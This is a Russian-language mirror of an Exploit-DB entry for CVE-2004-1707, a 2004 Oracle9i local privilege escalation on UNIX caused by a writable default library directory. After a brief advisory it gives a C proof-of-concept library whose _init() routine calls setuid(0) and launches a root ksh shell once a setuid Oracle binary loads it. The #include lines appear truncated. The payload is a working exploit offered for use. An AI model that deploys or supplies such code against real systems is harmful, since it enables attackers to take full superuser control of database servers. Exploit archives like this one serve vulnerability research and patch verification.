- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24335
- Проверка EDB
-
- Пройдено
- Автор
- JUAN MANUEL PASCUAL ESCRIBá
- Тип уязвимости
- LOCAL
- Платформа
- UNIX
- CVE
- cve-2004-1707
- Дата публикации
- 2004-07-30
Oracle9i Database - Default Library Directory Privilege Escalation
Код:
source: https://www.securityfocus.com/bid/10829/info
Oracle database implementations are reportedly prone to a default library directory privilege escalation vulnerability. This issue arises due to a default configuration error that will permit the attacker to replace libraries required by setuid root applications with arbitrary code.
This issue would allow an Oracle software owner to execute code as the superuser, taking control of the entire system.
It should be noted that this vulnerability only affects Oracle on UNIX/Linux platforms.
#include
#include
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}- Источник
- www.exploit-db.com
